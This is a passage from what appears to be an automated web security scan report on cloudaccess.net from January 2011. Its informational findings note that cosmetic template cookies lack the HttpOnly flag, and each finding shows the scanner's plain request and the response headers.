X-Content-Encoded-By: Joomla! 1.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.692. http://www.cloudaccess.net/about-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /about-us.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-us.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:53 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:53 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Last-Modified: Wed, 21 Jul 2010 02:19:35 GMT
Expires: Mon, 24 Jan 2011 14:07:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.693. http://www.cloudaccess.net/billing-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /billing-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /billing-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Sat, 22 Jan 2011 05:52:04 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.694. http://www.cloudaccess.net/client-login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /client-login.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:44 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /client-login.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:45 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Last-Modified: Tue, 30 Nov 2010 21:35:24 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.695. http://www.cloudaccess.net/cloudaccess-partner-program.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /cloudaccess-partner-program.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:36 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cloudaccess-partner-program.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:36 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Last-Modified: Tue, 21 Dec 2010 04:33:21 GMT
Expires: Mon, 24 Jan 2011 14:07:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.696. http://www.cloudaccess.net/constant-contact-integration.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /constant-contact-integration.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /constant-contact-integration.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Wed, 29 Dec 2010 22:57:38 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.697. http://www.cloudaccess.net/contact-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /contact-us.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:42 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us.html HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:42 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Last-Modified: Tue, 02 Nov 2010 20:37:37 GMT
Expires: Mon, 24 Jan 2011 14:07:43 GMT
X-Content-Encoded-By: Joomla! 1.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.698. http://www.cloudaccess.net/contact-us/474.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /contact-us/474.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:55 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/474.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:56 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Last-Modified: Sat, 17 Jul 2010 19:57:40 GMT
Expires: Mon, 24 Jan 2011 14:07:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.699. http://www.cloudaccess.net/copyright-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /copyright-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
